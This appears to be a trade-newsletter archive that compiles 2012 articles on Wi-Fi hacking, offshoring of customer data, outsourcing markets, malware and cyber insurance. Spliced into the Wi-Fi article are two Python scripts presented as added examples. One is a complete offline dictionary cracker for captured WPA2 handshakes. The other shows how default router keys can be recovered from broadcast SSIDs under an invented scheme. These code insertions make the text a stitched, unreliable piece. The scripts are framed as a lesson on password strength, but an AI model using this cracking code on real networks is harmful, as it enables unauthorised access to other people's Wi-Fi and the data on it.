Archive | Data Security

Why your Wi-Fi network is never safe

By Matt Smith

With almost 50 per cent of Australia’s internet subscribers using mobile or wireless broadband, serious concerns are being raised about the security of wireless systems and the ease of hacking.

Many residential networks are left vulnerable because users don't change passwords from the factory default, or don't set one at all.

Mark Gregory, a senior lecturer in computer engineering at RMIT, believes it isn’t just residential users that leave themselves vulnerable – businesses and some corporations do as well.

“About 20 per cent of Wi-Fi networks are left unsecure or have poor security. The most a user can do is make sure the password is strong, but even then ‘password security’ is a fallacy.”

Many networks are also protected only by older technology. Wired Equivalent Privacy (WEP), which dates from the original 802.11 standard of 1997, has long been broken; it was superseded in 2003 by Wi-Fi Protected Access (WPA), and WPA in turn by WPA2 in 2004.

Dr Gregory says the weakness of most home wireless networks lies with the modem manufacturer – repeated password failure does not lock down most modems, allowing hackers to continue to attempt to break in until they are successful.

“If a system timed out after a number of password failures, that would be enough to deter most would-be hackers,” Dr Gregory says. “A wireless modem should at least be able to prevent brute force attacks. Unfortunately manufacturers have been a bit lax.”
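The lockout point applies to online guessing against the modem's administration login. A WPA/WPA2 pre-shared key is usually attacked differently: the attacker records one four-way handshake and then tests passphrases against it offline, so the modem never sees a failed attempt and a lockout cannot help; only passphrase strength does. The script below, an added example rather than code from the article or from any tool it names, implements that offline check. The handshake it works on is constructed inside the script (SSID, MAC addresses, nonces and the passphrase are all made up) rather than read from a capture file.

```python
"""Offline dictionary attack on a captured WPA2-PSK four-way handshake.

Added example; not code from the article or from any tool it names. The
steps (PBKDF2 for the PMK, PRF for the PTK, HMAC-SHA1 over the EAPOL-Key
frame for the MIC) are those IEEE 802.11 defines for WPA2-PSK with CCMP
(EAPOL key descriptor version 2). The "captured" handshake is constructed
below instead of being read from a pcap; SSID, MACs, nonces and passphrase
are made up for the example.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    # This is the costly step, and it runs entirely on the attacker's hardware.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))
    # for CCMP (PRF-512 for TKIP). The KCK used for the MIC is the first 16 bytes either way.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(3)]
    return b"".join(blocks)[:48]


def eapol_mic(kck: bytes, frame_with_mic_zeroed: bytes) -> bytes:
    # Descriptor version 2: HMAC-SHA1 over the whole EAPOL-Key frame (MIC field
    # zeroed), truncated to 128 bits.
    return hmac.new(kck, frame_with_mic_zeroed, hashlib.sha1).digest()[:16]


# EAPOL header (4) + descriptor type, key info, key length, replay counter,
# nonce, IV, RSC, key ID (1+2+2+8+32+16+8+8) puts the MIC field at byte 81.
MIC_OFFSET = 81


def build_msg2(snonce: bytes, key_data: bytes) -> bytes:
    """EAPOL-Key message 2 of 4 (STA -> AP) with the MIC field still zero."""
    body = (
        b"\x02"                       # descriptor type: RSN
        + b"\x01\x0a"                 # key info: version 2, pairwise, MIC present
        + b"\x00\x00"                 # key length (unused in message 2)
        + b"\x00" * 7 + b"\x01"       # replay counter
        + snonce                      # 32-byte supplicant nonce
        + b"\x00" * 16                # key IV
        + b"\x00" * 8                 # key RSC
        + b"\x00" * 8                 # key ID
        + b"\x00" * 16                # MIC, filled in by the supplicant
        + len(key_data).to_bytes(2, "big")
        + key_data                    # RSN IE the station is using
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type Key


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    msg2: bytes  # message 2 as captured, MIC included

    def mic_matches(self, passphrase: str) -> bool:
        kck = derive_ptk(derive_pmk(passphrase, self.ssid), self.ap_mac, self.sta_mac,
                         self.anonce, self.snonce)[:16]
        zeroed = self.msg2[:MIC_OFFSET] + b"\x00" * 16 + self.msg2[MIC_OFFSET + 16:]
        captured = self.msg2[MIC_OFFSET:MIC_OFFSET + 16]
        return hmac.compare_digest(eapol_mic(kck, zeroed), captured)


def crack(hs: Handshake, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose KCK reproduces the captured MIC, else None."""
    for word in candidates:
        if hs.mic_matches(word):
            return word
    return None


# Constructed sample handshake standing in for a pcap (RSN IE: CCMP/CCMP/PSK).
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def sample_handshake(passphrase: str = "letmein2012") -> Handshake:
    ap, sta = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    ssid = "HomeNet"
    zeroed = build_msg2(snonce, RSN_IE)
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap, sta, anonce, snonce)[:16]
    msg2 = zeroed[:MIC_OFFSET] + eapol_mic(kck, zeroed) + zeroed[MIC_OFFSET + 16:]
    return Handshake(ssid, ap, sta, anonce, snonce, msg2)


if __name__ == "__main__":
    hs = sample_handshake()
    wordlist = ["password", "12345678", "letmein", "letmein2012", "qwertyuiop"]
    print("recovered passphrase:", crack(hs, wordlist))
```

Each candidate costs 4096 HMAC-SHA1 operations for the PMK plus a handful more for the PTK and MIC, all of it on the attacker's hardware; throughput is bounded by that hardware, not by anything the modem does. A short or dictionary passphrase falls to this in minutes, a long random one does not, which is the practical content of the advice to make the password strong.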

The serious nature of hacking was recently highlighted by Queensland Police, whose fraud squad began a wardriving initiative to help identify unsecure residential wireless internet networks.

Wardriving is the act of searching for Wi-Fi wireless networks from a car using a laptop.

“It’s a positive community support program, and the effort should be supported,” Dr Gregory says. “The issue should be taken seriously, and this response should be carried out in all states.”

With Wi-Fi signals reaching up to 100 metres, a potential hacker could be anywhere. ‘Nick’ (not his real name), a computer enthusiast who admits he is not an expert, found it simple to access other people's Wi-Fi networks illegally.

“A neighbour of mine didn’t have a password on their Wi-Fi,” says Nick. “Another didn’t change their network name or password from the default name of the router.

“You can just chuck it through a program dedicated to generating the password for that particular router. It might take some time, but it works. That’s more cracking than hacking, and it’s simple.”

Nick says there are plenty of forums on the internet dedicated to hacking and cracking, and that no Wi-Fi network will be completely safe.

“With a bit of an understanding of networking, a couple of programs to capture and analyse what’s going into and out of the networks, the right wireless adapter, a Linux operating system, and some patience, you can have whatever network you want,” he says. “There’s no such thing as a bulletproof Wi-Fi network; if someone is devoted enough they’ll get in.”

While many hackers could see it as an innocent challenge, others could use illegal Wi-Fi access to commit fraud or serious offences, such as accessing child pornography.

“These sound maleficent in nature, but it’s like a puzzle to those with a deep interest in the subject,” says Nick. “It’s a challenge, like a Rubik’s cube, and you’ll find that most hackers break in for those reasons alone.”

Many popular and specialised hacking tools are easily accessible through internet search engines. Programs such as Wi-Fi Hacker and NetStumbler are commonly used, and numerous tools and guides can be found on websites such as wardrive.net.

Many of these applications are easy to use. Some, such as iWep Pro, run on a jailbroken iPhone and can produce passwords for nearby Wi-Fi networks within minutes.

A Spanish application developer, “Mike Wazowski” (not his real name), says he developed the application to give users a tool to test the vulnerabilities of their own routers.

“The app will only unlock a network if it’s kept on the default password configuration,” Wazowski says. “I don’t know why so many people don’t change the password on their modem. I haven’t changed my own, so if you ask me, I’m just lazy.”

Wazowski confirms that iWep Pro users have reported good results in Australia, recovering the default passwords of BigPond, Thomson and Speedtouch Wi-Fi modems.
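What Nick's “program dedicated to generating the password for that particular router” and iWep Pro have in common is a default key that is computed from something the router already reveals. The script below is an added example, not code from the article, from iWep Pro or from any vendor: it models that weakness with a hypothetical derivation (the serial layout, SSID prefix and hash are invented here and are not the scheme of any real Thomson, Speedtouch or BigPond device) and shows why broadcasting an SSID derived from the same small serial space hands an attacker the key.

```python
"""Default Wi-Fi keys derived from the router's serial number, and how the
default SSID leaks them.

Added example; not code from the article, from iWep Pro or from any vendor.
The derivation is a hypothetical model of the weakness the article describes
(default SSID and default key both computed from a small-entropy serial
number). It is not the algorithm of any real Thomson, Speedtouch or BigPond
device; the serial layout "CP<YY><WW><3-char unit code>" and the SSID prefix
are made up here.
"""
import hashlib
import itertools
import secrets
import string
from typing import Iterable, List, Tuple

ALPHABET = string.digits + string.ascii_uppercase  # assumed unit-code alphabet


def vendor_defaults(serial: str) -> Tuple[str, str]:
    """Hypothetical factory defaults: one hash of the serial feeds both values."""
    digest = hashlib.sha1(serial.encode()).hexdigest().upper()
    ssid = "HomeGW-" + digest[-6:]   # broadcast to everyone in range
    key = digest[:10]                # printed on the sticker; most users never change it
    return ssid, key


def serial_space(years: Iterable[int], weeks: Iterable[int], alphabet: str = ALPHABET) -> Iterable[str]:
    """Every serial of the assumed form CP<YY><WW><unit code> in the given ranges."""
    for yy in years:
        for ww in weeks:
            for unit in itertools.product(alphabet, repeat=3):
                yield f"CP{yy:02d}{ww:02d}{''.join(unit)}"


def space_size(years: Iterable[int], weeks: Iterable[int], alphabet: str = ALPHABET) -> int:
    """How many serials (and hashes) the attacker must try at most."""
    return len(list(years)) * len(list(weeks)) * len(alphabet) ** 3


def candidate_keys(observed_ssid: str, serials: Iterable[str]) -> List[str]:
    """Attacker side: hash the serial space, keep keys whose SSID matches.

    The SSID suffix is 24 bits, so of ~22 million serials only a couple of
    false positives survive, and each survivor is one online join attempt.
    """
    suffix = observed_ssid.rsplit("-", 1)[-1]
    found = []
    for serial in serials:
        ssid, key = vendor_defaults(serial)
        if ssid.endswith(suffix):
            found.append(key)
    return found


def random_default_key(nbytes: int = 16) -> str:
    """What a manufacturer should do instead: an independent random key per unit,
    with nothing in the SSID that narrows it down."""
    return secrets.token_hex(nbytes)


if __name__ == "__main__":
    # Full space for the made-up layout: years 2004-2012, 52 weeks, 36^3 unit codes.
    print("serials to hash:", space_size(range(4, 13), range(1, 53)))  # 21835008
    # Demo on one year/week slice so it runs in well under a second.
    victim_ssid, victim_key = vendor_defaults("CP0615A7K")
    found = candidate_keys(victim_ssid, serial_space([6], [15]))
    print("SSID", victim_ssid, "-> candidate keys:", found, "| real key found:", victim_key in found)
```

Hashing the whole 22-million-serial space is a few minutes of CPU and is done once per SSID; the router's lockout behaviour is irrelevant because the attacker arrives with at most a handful of keys to try. Changing the key from the default, which is all the developer quoted above recommends, removes the link between the SSID and the key entirely.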

Read more: http://www.theage.com.au/digital-life/consumer-security/why-your-wifi-network-is-never-safe-20120424-1xi2m.html


Seriously, how secure is your Customer’s data?

By Mark Atterby – Senior Staff Writer

The Australian Government has raised concerns about the offshore dissemination of Australian citizens’ private data in discussions with the telecommunications industry.

Should the government legislate on whether customer data can be off-shored or not?
What would that mean for the BPO and Outsourcing Industries?

A recent report from CommsDay.com highlighted how the government has raised some proposals to enhance the security of Australia’s telecom infrastructure. A specific area of concern, according to the CommsDay report, is the extensive use of offshoring in support of the customer service functions of Australian telcos.

Most Australian telecommunications carriers now use outsourcing in support of customer service functions, in places including India, Sri Lanka and the Philippines. The government has floated requiring carriers to keep all customer data onshore or, at the very least, to report full details of their outsourcing and offshoring arrangements.

The threat of a call centre agent in India or Sri Lanka selling people’s personal details to a Ukrainian hacker is real. Laurence Barlow, from NRG Global Solutions, an Australian provider of outsourcing solutions, comments, “We do fraud work for some of the banks and have visibility of the issue… it’s very real. For the time being we have elected to keep our client data on Australian shores, albeit our call centres are offshore”.

This raises several questions. Should all data be kept onshore? Should the government legislate on the matter? And if data had to be kept onshore, what impact would that have on existing outsourcing initiatives?

This debate first emerged some years ago, came into particular focus with the first wave of cloud computing, and isn’t likely to go away for quite some time.

Chris Luxford, President of Aegis Services Australia, believes governments should be encouraging debate about the security of customer data and privacy: digital fraud is a multi-billion dollar global industry that needs to be tackled. But he believes the terms of the debate need to be clarified. “Does the situation where a call centre agent in India accesses customer details via a secure VPN with secure login credentials from a database server in Australia classify as offshoring customer data? Or is it when a database is physically housed in a different country? When we are proposing laws against offshoring data, what are we actually proposing? Is it the physical replication of data offshore or is it the accessing of data offshore?”

Or is it only when an Australian organisation hands over its customer database to a third-party offshore provider?

Is the issue one of location or one of security? As Luxford points out, the call centre agent in the scenario above would have to write details down before passing them to anyone else, whereas an overseas attacker exploiting a security failure in an organisation’s firewall could pull thousands of records from a database located in Australia.

We can assume Australians are comfortable providing confidential financial information to offshore providers: the national trend towards online shopping from around the globe shows a willingness to trust offshore payment gateways, and the proliferation of social media sites like Facebook shows that people will put far more than their credit card details online.

Australian consumers are targets for overseas scammers and fraudsters. Recently the level of phone scams in Australia has overtaken online scams: figures released last year by the Australian Competition and Consumer Commission showed that 52 per cent of people who reported scams in 2011 had been contacted by telephone.

Most of these scams originate overseas, outside Australian jurisdiction, which means the Australian government can’t prosecute the organisations or people involved unless they have some connection with an Australian organisation. These scammers dial randomly generated numbers to target particular regions, using information gleaned from newspapers and the Internet.

Requiring data to be kept onshore is unlikely to affect the activities of these fraudsters. Then again, they are the last people in the world you want receiving, say, a bank’s database of customer details: their use of it would be unscrupulous, and with those details their scams would appear far more convincing.

Most BPO and outsourcing providers work closely with their clients to ensure very high levels of security and welcome ongoing debate on how it can be improved. Luxford comments, “You can’t be a successful outsourcer without taking security extremely seriously. Does the industry need to do more? Yes. Security is a journey not a destination. We need to continuously look at how we can improve security. We need to be continuously on the front foot to reduce the fear and improve the confidence of the marketplace”.

Most Australian organisations invest considerable resources in ensuring the security of their data and most have robust practices and standards in place to counter fraud. They can face significant fines, damage to reputation and loss of business if they fail to manage data about their customers adequately and breach privacy regulations.

“Most organisations today are extremely vigilant with customer data and are not allowing other organisations, particularly outsourcers, access to customers data via the providers systems. In many cases I have seen the client demand that the outsourcer not only use their applications, but also use their PCs and hardware”.

In offshoring work, it is important to realise that there are differences in culture and business practices. According to Laurence Barlow, president of NRG Global Solutions, “This doesn’t mean that things are done better or worse in other countries. It’s just different, culturally and how that translates into business practice. The challenge in terms of offshoring work to Asia or anywhere is to ensure consistency.”

Barlow advises that, when establishing an offshore operation, the way to ensure consistency and to address security and compliance issues is to have Australian management heavily involved in that operation. So whether an Australian telco is setting up a captive operation or relying on a third-party provider, it is important to have Australian management teams working with local teams to ensure consistency, compliance and quality.

The outsourcing industry strongly supports open and reasonable debate about the security of customer data and privacy. Luxford comments, “I believe in any legislation or regulatory regime that builds trust and faith for consumers to engage in the digital economy and enjoy the associated benefits. But we must be careful not to over regulate and slow down the growth and development of this economy or the potential for companies to provide goods and services.”


Market Snippets – Week 6, Year 3

Demand for multi-skilled IT workers with business knowledge and for big-data specialists, huge spending on cloud and a new era of outsourcing will characterise the year ahead, says market analyst IDC. IDC Australia chief of research Matt Oostveen said in-demand IT workers would need business skills and would increasingly compete with an international pool of highly trained workers in cheaper labour markets.

Talent2 International Limited (ASX: TWO) announced today that it had been selected by the Queensland Government, through a competitive tender, as the ICT Contractor Resource Manager. The three-year contract will see Talent2 take responsibility for the implementation and management of a Managed Service Program (MSP) across all 13 Queensland Government Agencies. This program will cover the procurement and performance management of all ICT contractors and suppliers that provide services to the Queensland Government. This program will improve the economy, effectiveness and efficiency of ICT contractor resource management for the Queensland Government.

SonicWALL, Inc., the leading provider of intelligent network security and data protection solutions, today announced it has expanded its suite of firewall security services with the addition of Kaspersky Anti-Virus to its Enforced Client Anti-Virus and Anti-Spyware solution. SonicWALL® Firewalls ensure easy deployment, provisioning and enforcement of the client on endpoint devices through a unique policy-driven engine. SonicWALL Next-Generation and Unified Threat Management firewalls already provide gateway anti-virus through SonicWALL’s proprietary reassembly-free deep packet inspection anti-malware solution, protecting the perimeter, wireless and VPNs. But viruses can still enter the network through other entry points, including laptops, thumb drives or other unprotected systems. While protection at multiple layers is the best defense against sophisticated modern threats, deploying, maintaining and enforcing the right security software on endpoint devices can strain IT resources and budgets.

New release of Unisys Secure Cloud Computing Solution gives clients better, more cost-efficient resource management. Release 2.1 includes a new dashboard that gives administrators a single, integrated view of all cloud resources: servers, networks, storage systems and more. They can use the dashboard to determine the operational status of specific resources, take action to respond to business changes in real time, deliver the performance mandated by service-level agreements (SLAs) and increase infrastructure productivity.

Nespresso revolutionises its Business Solutions after-sales service with a machine-to-machine solution from Orange. Nespresso Business Solutions is enhancing its B2B coffee machine after-sales maintenance with a customised machine-to-machine (M2M) solution from Orange Business Services. Nespresso has launched two B2B machine models, Aguila and Zenius, billed as the industry’s first connected tabletop coffee machines. They use embedded SIM cards from Orange to communicate with the Nespresso Customer Relationship Centres; this two-way communication enables remote diagnostics, and preventive maintenance visits can be scheduled as required.

International recruitment company HARVEY NASH launches new career opportunities and outsourcing services in Sydney, Australia. The company already has several years’ experience in the Australian market, working for international clients from its existing worldwide network of 40 offices, including Hong Kong and Vietnam. The new office marks a significant investment in the Australian market and reflects confidence in the strength of its economy as well as the increasing demand for highly skilled talent both locally and offshore.


IT Security must improve

Global Increase in Outsourcing Forces Organizations to Improve their Information Security Posture to Prevent Devastating Breaches

“If an organization is looking to do a large infrastructure outsourcing engagement, the best way to ensure that security is a priority is to build a comprehensive list of security requirements into outsourcing contracts, develop appropriate service level agreements and reporting mechanisms to evaluate security and budget for a review by an independent assessment organization. This will ensure that security always stays top of mind,” said panel speaker Chris Oglesby. “If, however, the decision is to outsource infrastructure and security separately, then the security operations should drive the direction and outcomes and create independence between the organizations to meet the client needs.”

In the future, companies need to employ executive IS leaders who will develop methods to adequately protect the IT infrastructure when outsourcing in-house responsibilities. Platforms such as EC-Council’s CISO Executive Summit Series give top-level IS executives a means to gather and discuss the latest industry challenges. Continuous education and knowledge sharing will provide solutions to the quandaries top executives face on a daily basis. For more information on upcoming EC-Council CISO Executive Summits, visit: www.eccouncil.org/cisosummit.

Read more: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2012/02/13/prweb9183078.DTL&ao=2


Software dev’t, KPOs pushed to improve IT sector in Cebu

By Marlen D. Limpag

Joel Mari S. Yu, Cebu Investment Promotions Center (CIPC) managing director, explained that this thrust is also in line with the recommendation of international research firm Tholons for Cebu to improve its knowledge process outsourcing (KPO) capabilities and make inroads in information technology outsourcing (ITO).

IT-BPO is one of two fast-growing sectors in Cebu, with export sales increasing from barely $200 million in 2005 to $1.5 billion in 2011 based on CIPC estimate, Mr. Yu said during the 2012 Cebu Annual Economic Forum and Investment Briefing initiated by the Cebu Business Club and the University of San Carlos (USC) Economics Department.

Records from the Philippine Economic Zone Authority (PEZA) show Cebu currently has 126 foreign direct locators, which employ around 65,000 workers according to CIPC.

The IT-BPO firms are distributed over the following locations: 72 in Asiatown IT Park and eight in Cebu Business Park in Cebu City, one in HVG IT Park in Mandaue City, and 45 in various other buildings.

The bulk of service providers and employees, however, are concentrated in the BPO sub-group, which is the lowest level in the sector and deals with routine call centre work, at 72%, according to Mr. Yu.

KPO has a 13.5% share while ITO has 14.5%.

He said Cebu is working hard to sustain its ranking in a Tholons global study as ninth of top 10 emerging outsourcing cities by putting in investments in infrastructure as well as developing organizations and creating policies that would support the sector’s growth.

It is also taking seriously the recommendations of Tholons to develop a constant supply of skilled workers, maximize its customer support and call center services, and improve its knowledge process and information technology outsourcing capabilities.

“Cebu is growing phenomenally but with it comes an accompanying challenge. We must cope with that growth but we are not doing very well in that direction. We have a product that sells. We are world-class service providers for English-speaking call centers and IT-enabled services,” he said.

Mr. Yu said a comparison study that they asked Tholons to conduct showed Cebu was way above India in basic and analytical abilities but miles behind in software development skills.

Recent assessment tests showed as well that the gap between the needs of the industry and the skills provided by the academe has narrowed, except in verbal ability and American LCT, he added.

Cebu’s lower minimum wage, cheaper food, and less expensive real estate are its cost advantages over Manila, which was fourth in the Tholons ranking, he added.

The five biggest call centers in Cebu ranked according to size are Convergys, Qualfon, Aegis PeopleSupport, Stream Global Services, and Sykes Asia and they employ a total of 17,700 employees.

Cebu could do better, though, Mr. Yu said, citing that Accenture in Manila has a total of 23,000 workers in eight locations.

Since Cebu’s voice locators are from the US, it would suffer if the US Congress passed a bill restricting offshoring by American firms. Mr. Yu pointed out, however, that there is already an increasing number of KPO and ITO companies in Cebu from other countries, such as Japan, Australia, India and Canada.

Source: BWorld Online


Protection needed in public networks for mobility

By Martin Conboy, Editor

With so much consumer traffic now moving away from front-office call centres, outsourced or captive, to internet and web-based channels, malware is a growing and significant risk for companies that are expanding their universal queue to include online channels, social media among them. Blue Coat Systems, a provider of web security and WAN optimisation products, recently announced that its WebPulse collaborative defence had reached a milestone by serving one billion requests for web content in a single day. Nine million of those requests came from Australia.

(Malware, short for malicious software, is code, scripts, active content or other software designed to disrupt or deny operation, gather information that leads to loss of privacy or exploitation, gain unauthorised access to system resources, or otherwise abuse a system. Computer professionals use the term generically for hostile, intrusive or annoying software.)

More than 20 per cent of the one billion requests were for search engines and portals, the most consistently requested category and also the leading entry point through which users reach malnets (malware networks). More than 10 per cent of the requests were for social networking, the third most requested category of content.

Of the billion requests, more than one million were for content identified as malware sources. “The ability of WebPulse to analyse and correlate such a massive amount of information about the web ecosystem creates a powerful defense. This allows us to identify and track the malnets that are responsible for launching attacks on unsuspecting users,” said Greg Singh, Systems Engineering Manager, Blue Coat A/NZ. “The more requests WebPulse receives, the more we understand how these malnets work, the tactics they use and the exploits they serve, which allows us to better protect users through our collaborative defense.”

Anthony James, GM of Blue Coat’s Cloud Services Division, said that BYOD (bring your own device) is the next evolution of the threat to security.

Smartphones and email may have released us from our desks, but they have also chained us to our jobs. It’s called “time pollution”, and a new Australian study, ‘The Polluted Times’, commissioned by the Australia Institute, reports that three out of five employees polled worked outside normal working hours and that one in four said their employers expected them to work from home. Seven out of eight employees supplied with an office smartphone or laptop worked from home, but more than half (52%) of those without office-supplied equipment still worked from home on evenings and weekends.

“It’s not necessarily management compelling people to do it, it’s a change in work practices that brings about a whole different way of thinking about work to the detriment of the rest of life,” explained Josh Fear, Deputy Director of The Australia Institute. The habit is called ‘crackberry’.

So it stands to reason that some people will wander off to sites they would not visit in a 9-to-5 office environment, on the rationale that nobody misses a slice off a cut loaf.

Many companies also give their employees an allowance to buy the mobile device of their choice, be it an iPad, smartphone or laptop. Blue Coat’s James explained that companies need to get serious about mobile device management. They need to control which websites employees can visit and, if employees reach forbidden sites by accident or design, protect them from malware when they get there. He explained that it was not about ‘nannying’ people but about putting web security controls in place, so that an employee landing on an infected site does not carry that infection, like a contagion, back into the business network.


BPO Call center firms face ‘tough battle’ for new business

OUTSOURCING FIRMS are wary of expanding in the near term given perceived risks and low demand from major markets, research firm Ovum yesterday said.

“Companies that provide offshore contact center services face a tough battle to win new business over coming years, as demand in major markets is low,” Ovum said in a statement, citing a poll of leading North American, European and Australian firms.

Only 2% of the firms polled would consider offshoring in the next 12 to 24 months, with another 10% of the firms planning on doing so in 25 to 36 months. A substantial majority, or 80%, said “they had no plans to offshore their contact centers,” Ovum said.

“These numbers will make worrying reading for companies that provide offshore contact center services and are hoping to win new business based on their ability to reduce costs for clients,” Ovum analyst Peter Ryan was quoted as saying.

“Several new barriers to offshoring contact center work have come to the fore and made it a riskier prospect for enterprises. Enterprises feel that the reduced prices simply don’t compensate for the potential to lose customers in these tough economic times,” he added.

The four key issues said to be facing companies are the quality of interaction between agents and customers, stability of the offshore location, pressure in keeping business within the domestic country and fears over data safety.

Ovum noted that low costs had led to regions such as India and South America becoming established contact center locations.

Sought for comment, a representative of the Philippine outsourcing industry said they remained optimistic about business prospects.

“We know that growth of contact center services will slow but the global market will still remain larger than what providers can supply,” Business Process Association of the Philippines (BPAP) Executive Director Gillian Joyce G. Virata said.

“Growth… will be fastest in non-voice BPO (business process outsourcing) and IT (information technology) and in industry-specific services where Philippines has competitive advantages such as banking, financial services, insurance, health care, IT and creative services,” she added.

The BPAP expects the local outsourcing industry to earn $11 billion this year, and to grow that by at least 20% in 2012. Revenues totalled $9 billion last year.

Source: BWorld Online


Got cyber insurance?

By Lamont Wood (Network World)

Heartland Payment Systems figured it was in pretty good shape when it took out a $30 million cyber insurance policy. Unfortunately, the credit card transaction processor was the victim of a massive data breach in early 2009 that resulted in losses estimated at $145 million. The insurance company did pay Heartland the $30 million, but the company was on the hook for the remaining $115 million.


So, is cyber insurance worth it? Is it right for your company? What type of coverage should you get? How much is enough? And what are the gotchas to watch out for?

The first point to understand is that standard business insurance does not cover data breaches or almost any other loss involving data. Standard insurance covers tangible losses and damage. Data isn’t tangible.

For that distinction you can thank American Guarantee & Liability Insurance Co. v. Ingram Micro Inc., a 2000 ruling of the U.S. District Court in Arizona, which held that a computer outage caused by a power problem constituted physical damage within the meaning of the policy Ingram Micro had purchased from American Guarantee.

“After that, the insurance firms changed their policies to state that data is not considered tangible property,” says Kevin Kalinich, national managing director for network risk at insurance vendor Aon Risk Solutions. The upshot is that an enterprise needs special cyber insurance to cover data-related issues. The problem is that the field is new and there is no such thing as standard coverage with a standard price.

The resulting complexity is a major source of push-back by potential buyers, according to Larry Ponemon, chairman of the Ponemon Institute, a research organization focused on information security and protection.

“The policies have limitations and constraints similar to home policies with act-of-God provisions, and that has created a lot of uncertainty about what is covered, and what the risks are,” Ponemon says. “Those who are nevertheless purchasing cyber insurance are typically very selective about what coverage they want,” he adds.

Types of cyber coverage currently available include:

Data breach coverage: This pays for expenses that result from a data breach. Covered expenses typically include notification of the victims, setting up a call center, credit monitoring and credit restoration services for the victims, and other crisis management services, says Ken Goldstein, vice president at the Chubb Group, an insurance vendor. “You might want to hire forensic experts, independent attorneys for guidance concerning the multiple state (data breach notification) laws, and public relations experts. The more thoughtful ones respond in a way that shows they are taking the situation seriously,” he says.

Regulatory civil action coverage: Pays in cases where the insured is facing fines from a state attorney general after a data breach, or from the federal government after a violation of the Health Insurance Portability and Accountability Act (HIPAA) or similar regulations. Some policies only cover the cost of defending against the action, while others may pay the fine as well, says Steven Haase, head of INSUREtrust, an Atlanta-based specialty insurance provider.

Cyber extortion coverage: For cases where a hacker steals data from the policy holder and then tries to sell it back, or someone plants a logic bomb in the policy holder’s system and demands payment to disable it.

Among other things, the policy should cover the cost of a negotiator, and the expense of offering a reward leading to the arrest of the perpetrator, Goldstein says.

Virus liability: Pays in cases where the policy holder is sued by someone who claims to have gotten a virus from the policy holder’s system.

Content liability: Covers lawsuits filed by people angered over something posted on the Web site of the policy holder. Such coverage should also cover copyright claims and domain name disputes, Haase says.

Lost income coverage: Replaces revenue lost while the policy holder’s computer system or Web site is down.

But Kalinich notes that insurers often apply minimum downtimes of 12 or 24 hours, or require proof of actual losses. “They’ll say that, after all, the customers who did not get through (during the outage) could have come back later,” he says.


Loss of data coverage: Pays for the cost of replacing the policy holder’s data in case of loss. “Backup policies are not always effective, and accidents and sabotage happen,” Haase says.

Errors and omissions coverage: Otherwise known as E&O policies, this type of coverage predates cyber insurance, but is increasingly added to cyber policies to cover alleged failures by the policy holder’s software, Haase says.

Your rates may vary

As for what coverage costs, Kalinich says that firms smaller than $100 million in annual revenue can expect to pay $5,000 to $15,000 per million of coverage, while larger firms would pay $10,000 to $25,000. For those over a billion, the price can be in the $20,000 to $50,000 range.

Robert Parisi, senior vice president with Marsh, an insurance broker and risk advisory firm, put it more simply, saying the cost is between $7,000 and $35,000 per million.

Of course, the lower ranges are for buyers who look like better risks — and deciding who is a better risk is another factor that makes cyber insurance a complex topic.

“You cannot get good insurance unless you have good security practices,” Kalinich says. “Due diligence underwriting has become more streamlined as the insurers have learned what to look for. They will typically benchmark you against other members of your industry.”

“Applications are not turned down very often,” adds Haase. “But ‘do you encrypt your data?’ is a common question on an application, and 95% of the prospects don’t. They get scared, and the application process stalls. But almost every insurer will offer coverage anyway — although, for a healthcare firm especially, the policy would be considerably cheaper if it does encrypt.”

“No one question is going to knock you out of consideration — unless you’ve already had millions in losses, or demonstrate extremely poor controls,” agrees Toby Merrill, vice president of insurer ACE Professional Risk.

But being accepted does not mean that the insurance that is offered will be worth having, cautions Kalinich.

“Some insurers will slap on all sorts of exclusions to make the insurance worse than worthless while they still collect the premium,” he says. “They may say that you are excluded if you don’t stay updated with the latest security software. But no one can stay patched 24-7. If they find that you don’t encrypt your laptops, then they will exclude laptops that are not encrypted. But that is where you need the insurance. So the specific wording of a policy is very important,” he says.

The more sophisticated buyers, says Merrill, are concentrating on what he calls the quality of the coverage.

This would include the insurer’s ability to refer the policy holder to legal and forensic experts if there is a breach, how liberal the insurer is in terms of what it will pay for, and whether prior approval is required before outlays are made, he says.

But, apparently, sophisticated buyers are not the norm, if only because the rapid uptake means there are a lot of first-time buyers.

“For the last five years the market has been rocking along with annual growth of 10 to 15%, while this year it’s 30 to 40%,” Haase says.

“Of the top 100 corporations in a given industry,” estimates Parisi, “twenty-five percent have bought it, 15 are in the market, and 40 to 50% will be buying it within a year. This coverage is growing fast, and at a time when the economy is distressed.”

Sources credit media coverage of various data breach disasters for spurring the growth. Yet, “We still see prospects with no security plan in place,” Goldstein says.

Beyond that, “For first buyers, it’s painful,” Kalinich says. “They have to coordinate their IT and legal and human resources and risk management departments, and break down the silos for those areas.” (Human resources is involved because of the need to respond to questions about security training practices.)

Enterprises interested in applying for cyber insurance should, as a first step, fill out an insurance application, sources agree. In the end they may not buy the insurance, but the process of filling out the application can be educational.

“Even if they don’t buy any insurance they will understand their exposure better and will be able to discuss it with their boards of directors in an intelligent manner,” Kalinich says.

“There are questions on it you might not have thought of yourself,” Merrill adds. “I’m not saying you should then submit it — just use it to educate yourself. Then bring in a broker.”

